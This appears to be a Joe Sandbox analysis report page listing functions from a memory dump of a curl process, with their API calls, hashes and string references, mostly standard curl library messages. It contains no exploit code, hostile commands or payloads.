Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: freadfreerealloc
String ID:
API String ID: 2644717162-0
Opcode ID: 069621f0004eac13de0461cb1b3719076724de2b59ece4f63e2ab97dd2d1a185
Instruction ID: 36fdd39c5f6926c7c583f1c62d9691b846ff01130c7ebe9a1d5870394501e660
Opcode Fuzzy Hash: 069621f0004eac13de0461cb1b3719076724de2b59ece4f63e2ab97dd2d1a185
Instruction Fuzzy Hash: 52216B726083029BC311AF2AC88076BB7E4EF85350F45043EF888DB351E778D8458B9A

Function 00426B00 Relevance: 9.1, APIs: 6, Instructions: 86stringCOMMON

Download Yara Rule

APIs

isspace.MSVCRT ref: 00426B4D
strchr.MSVCRT ref: 00426B5E
isspace.MSVCRT ref: 00426B82
memcpy.MSVCRT ref: 00426BAA

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: isspace$memcpystrchr
String ID:
API String ID: 3778634221-0
Opcode ID: b0cf04366e2be2d9fc4e04920560ebd24ab618a29de0889eb35bf514122cc865
Instruction ID: cf8c6bba3aa70048a229dac91e82c2c8130cf8b3eb81c8b3ee321c257f5d0be9
Opcode Fuzzy Hash: b0cf04366e2be2d9fc4e04920560ebd24ab618a29de0889eb35bf514122cc865
Instruction Fuzzy Hash: CA21E3726083709ACB606F35A88036BBFE05B01395F86096FD8C4C7346F63AE805875A

Function 0040BDB0 Relevance: 9.1, APIs: 6, Instructions: 86stringCOMMON

Download Yara Rule

APIs

fgets.MSVCRT ref: 0040BDE7
strchr.MSVCRT ref: 0040BDFF
strchr.MSVCRT ref: 0040BE16
realloc.MSVCRT ref: 0040BE65
strcpy.MSVCRT ref: 0040BE7B
free.MSVCRT ref: 0040BEB8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr$fgetsfreereallocstrcpy
String ID:
API String ID: 4250867654-0
Opcode ID: a16dc1c522066f270128f4e506a888f53efa1a3836647b0f535d7c99fccf9fff
Instruction ID: 9a4ee9b6b6abe08ae3a6310c77d8656af01cd9645dc1ff6171dd950895a8fd49
Opcode Fuzzy Hash: a16dc1c522066f270128f4e506a888f53efa1a3836647b0f535d7c99fccf9fff
Instruction Fuzzy Hash: AD316F722083089BD7209F69D88179BB7E4EF81354F05883EE998C7341E73DD848CB95

Function 0044BF50 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0044BF8B
signal.MSVCRT ref: 0044BFE2
signal.MSVCRT ref: 0044C02D
signal.MSVCRT ref: 0044C055

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: bba6137328cb5f52c46728a22e05f099296c68b032d49083e2edad27a4a58f40
Instruction ID: 36c3c694b3c16257c52d1001e13d30c4fc30f488fce8ea0e567126edc1dcf78b
Opcode Fuzzy Hash: bba6137328cb5f52c46728a22e05f099296c68b032d49083e2edad27a4a58f40
Instruction Fuzzy Hash: 9B2121711092008BF7606FA5C99436EB694EB05359F19480BE598CB391D77DC888AF9B

Function 00427600 Relevance: 9.1, APIs: 6, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00427616
isspace.MSVCRT ref: 0042764F
strchr.MSVCRT ref: 00427660
strlen.MSVCRT ref: 00427670

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$isspacestrchr
String ID:
API String ID: 1919004015-0
Opcode ID: cc82e9dbbf7cfad2dd31b2256a677edc611909b5cb31a7df0ec179545efc000d
Instruction ID: 0303a522d6b7323602a200b9ff3f3873c589852b030ce4d0006aa0c6ea40d2ed
Opcode Fuzzy Hash: cc82e9dbbf7cfad2dd31b2256a677edc611909b5cb31a7df0ec179545efc000d
Instruction Fuzzy Hash: A721987160D7215AC7107F7AA98431EBBD4AF417A4F45482FECC487302F67DD845875A

Function 00423450 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 004235A3
strcpy.MSVCRT ref: 004235D8
SetLastError.KERNEL32 ref: 004235EF

Strings

%lx, xrefs: 0042358C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastcurl_msnprintfstrcpy
String ID: %lx
API String ID: 4204188090-1448181948
Opcode ID: 9134e08a0be595b7d4906f5352e68b2bffce18d6c463d1095920e496437e1960
Instruction ID: e2dd3e4db995bbfcc30befb60a985034b38cd26c06aa3333fc805b1f3c9d752d
Opcode Fuzzy Hash: 9134e08a0be595b7d4906f5352e68b2bffce18d6c463d1095920e496437e1960
Instruction Fuzzy Hash: 3261D732F002249BCB308E6CE88015EB7B5AB45326F65472BE879973D0D73D9E85CB46

Function 0042F72C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 0042F615
curl_maprintf.CURL ref: 0042F7A7

Strings

/, xrefs: 0042F606
%s%s, xrefs: 0042F79C
Wildcard - START of "%s", xrefs: 0042F7F0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintfstrrchr
String ID: %s%s$/$Wildcard - START of "%s"
API String ID: 1903960775-2244221728
Opcode ID: 64e5d7a47c5d1716428397868e935bdc63a1022f55bbdec162e26d8d61664275
Instruction ID: b905f4e93a3b29848a73ca543517233ae0f4ac1c041bf343f250350dd90ea2d0
Opcode Fuzzy Hash: 64e5d7a47c5d1716428397868e935bdc63a1022f55bbdec162e26d8d61664275
Instruction Fuzzy Hash: 488112B4308A119FD708DF28D48475AB7E0FB88304F95C67AE5988B355DB39E885CF89

Function 00417870 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 167stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00417520: curl_maprintf.CURL ref: 00417535
Part of subcall function 00417520: tolower.MSVCRT ref: 00417560

strlen.MSVCRT ref: 004178A9
time.MSVCRT ref: 00417978

Strings

Hostname in DNS cache was stale, zapped, xrefs: 004179B4
Hostname was %sfound in DNS cache, xrefs: 004178FB
NOT , xrefs: 00417908

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintfstrlentimetolower
String ID: Hostname in DNS cache was stale, zapped$Hostname was %sfound in DNS cache$NOT
API String ID: 1604481862-3064138397
Opcode ID: e076f4553cc5d193c990411db9be7de1b28b7480a0278e64384a978bc4fcfd44
Instruction ID: 0ce679c5570c2ac7956d3b70f215c4c4d09a45cbe85c75241b2eb2eb135c2c40
Opcode Fuzzy Hash: e076f4553cc5d193c990411db9be7de1b28b7480a0278e64384a978bc4fcfd44
Instruction Fuzzy Hash: F06105B460C7028FD700EF2AD58466BBBF5AF84754F15882EE88887351E778DC84CB96

Function 00432E6C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00432E86

Part of subcall function 00421080: GetTickCount.KERNEL32 ref: 00421084

_open.MSVCRT ref: 00432F09
_write.MSVCRT ref: 00432FED
_close.MSVCRT ref: 0043303F

Strings

\, xrefs: 00432E79

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CountTick_close_open_writestrchr
String ID: \
API String ID: 67027668-2967466578
Opcode ID: 97a58f19738b2046d8e0a341935303bb52f15d87566946d3a46badca1e932b25
Instruction ID: 0edd714280dc49801595c181283eb9be9372f105462167a0e8d27c32bf5952f9
Opcode Fuzzy Hash: 97a58f19738b2046d8e0a341935303bb52f15d87566946d3a46badca1e932b25
Instruction Fuzzy Hash: 66514A75A097009FC750DF28C58069ABBE0BF88354F19993FEC88CB351EB78D9408B86

Function 004270F0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

isspace.MSVCRT ref: 004271AF

Strings

Authentication problem. Ignoring this., xrefs: 004271FC
Ignoring duplicate digest auth header., xrefs: 0042715A
Digest, xrefs: 0042713C
Basic, xrefs: 0042722C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mvsnprintfisspacestrlen
String ID: Authentication problem. Ignoring this.$Basic$Digest$Ignoring duplicate digest auth header.
API String ID: 391599812-1110848539
Opcode ID: c14b6e1ea027330a8206374184230a08310665c6537695e5ce95b19948e8ffa8
Instruction ID: 1838889541eaaa7f7d06492cbc0f90991ff794f7aefe0cb331e2f82ce7ff8b00
Opcode Fuzzy Hash: c14b6e1ea027330a8206374184230a08310665c6537695e5ce95b19948e8ffa8
Instruction Fuzzy Hash: A9418D7020C3659FCB109F25D8446BBBBE0AF41348F89C85EE8C887351E738E995DB1A

Function 0042CB69 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 0042CBB3
curl_msnprintf.CURL ref: 0042CC59

Strings

Skips %d.%d.%d.%d for data connection, uses %s instead, xrefs: 0042CBEA
%d,%d,%d,%d,%d,%d, xrefs: 0042CBA8
0, xrefs: 0042CC4E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfsscanf
String ID: %d,%d,%d,%d,%d,%d$0$Skips %d.%d.%d.%d for data connection, uses %s instead
API String ID: 2384688562-2835452991
Opcode ID: 5b35ad74782bb376bf951e21f0ddac79af31a0835fa368467a5c981431f7018d
Instruction ID: 6a733980d15ecd42a7daab1d410eaf5e4d520cff500a8163157bbb6f968bd780
Opcode Fuzzy Hash: 5b35ad74782bb376bf951e21f0ddac79af31a0835fa368467a5c981431f7018d
Instruction Fuzzy Hash: F141A0B4A093119FC750DF19D18075FBBE1AF88744F55892EF8898B311E738E944CB96

Function 0044C1D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 0044C274
VirtualQuery.KERNEL32 ref: 0044C2A9
memcpy.MSVCRT ref: 0044C2CF

Strings

Address %p has no image-section, xrefs: 0044C3EB
VirtualQuery failed for %d bytes at address %p, xrefs: 0044C3D7, 0044C403

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: QueryVirtual$memcpy
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2264504374-157664173
Opcode ID: 42c6b47dbb906f162a7e58b56f6f4c98dbc845d7d9a2daeffea9ed6ed06a1236
Instruction ID: a4df1732fe81902f45ef17e000a784d1cd52582b7072dff3a554ebbe01fadcc8
Opcode Fuzzy Hash: 42c6b47dbb906f162a7e58b56f6f4c98dbc845d7d9a2daeffea9ed6ed06a1236
Instruction Fuzzy Hash: D63139709053059FEB54DFA9D5C0A9EBBF0FB44344F08842EE9489B311D778E841CB99

Function 00403DE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00403B00
malloc.MSVCRT ref: 00403D19
curl_formadd.CURL ref: 00403D9F
free.MSVCRT ref: 00403DAF

Part of subcall function 004037D0: strchr.MSVCRT ref: 00403806

Strings

filename=, xrefs: 00403DFC

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$curl_formaddmallocstrchr
String ID: filename=
API String ID: 3151629851-3079552418
Opcode ID: d915499b7c2aac56d4f452921b50cd683d04d71c7ada992a8c044183bb3a73d3
Instruction ID: 55b82f516278a3ece7331386dec11cf961a6cb040ca90e53d79aa924aa21fa08
Opcode Fuzzy Hash: d915499b7c2aac56d4f452921b50cd683d04d71c7ada992a8c044183bb3a73d3
Instruction Fuzzy Hash: 25418B706083058FD710DF25C48075ABBF4FF85349F04882EE9889B391E779EA85CB46

Function 00403E3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 004037D0: strchr.MSVCRT ref: 00403806

free.MSVCRT ref: 00403B00
malloc.MSVCRT ref: 00403D19
curl_formadd.CURL ref: 00403D9F
free.MSVCRT ref: 00403DAF

Strings

skip unknown form field: %s, xrefs: 00403E79

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$curl_formaddmallocstrchr
String ID: skip unknown form field: %s
API String ID: 3151629851-1777358745
Opcode ID: 91a74a1741fec20bc82f46fd719dfbafd6c6611cc7b3b8e8af9876dc81fb023a
Instruction ID: 8de008d192311e2440596a14732d97eaac4ecf0d67ecfd2ec60290926541c279
Opcode Fuzzy Hash: 91a74a1741fec20bc82f46fd719dfbafd6c6611cc7b3b8e8af9876dc81fb023a
Instruction Fuzzy Hash: F3414A745083458FD710DF24C48065ABBF5BF85309F14896EE8C8AB391E779EA85CB46

Function 0040CF20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040CF2C
malloc.MSVCRT ref: 0040CF3B
isprint.MSVCRT ref: 0040CF9C
curl_msnprintf.CURL ref: 0040CFC3

Strings

\%03o, xrefs: 0040CFB3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfisprintmallocstrlen
String ID: \%03o
API String ID: 4062680085-2703259314
Opcode ID: 26a0886944bd5fc8732dd8a8eb33525230a8f451f4ab3752dc3c14f2ad5eb54c
Instruction ID: 84287c75380601c0ad200ce5c513d3a8c64f21b771a88d7adafa7367c41e8ef6
Opcode Fuzzy Hash: 26a0886944bd5fc8732dd8a8eb33525230a8f451f4ab3752dc3c14f2ad5eb54c
Instruction Fuzzy Hash: 1531C5A1D48392CAE7205F348881767BBE1AF61704F19853FE8C8673D2F27D4889975B

Function 00414DF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 00414E55
setsockopt.WS2_32 ref: 00414E9F
VerSetConditionMask.KERNEL32 ref: 00414EF2
VerifyVersionInfoA.KERNEL32 ref: 00414F0E

Strings

@, xrefs: 00414E00

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ConditionInfoMaskVerifyVersiongetsockoptsetsockopt
String ID: @
API String ID: 3307559826-2726393805
Opcode ID: 2e46eb2cc47346095727d2d7e89b9f81f9cbd74baadce94c6482a4830cedf2a4
Instruction ID: 0ca14f2a387bb6721833bdb119bf1421f80f7ce9d51366a8edc5d2ad8ec86918
Opcode Fuzzy Hash: 2e46eb2cc47346095727d2d7e89b9f81f9cbd74baadce94c6482a4830cedf2a4
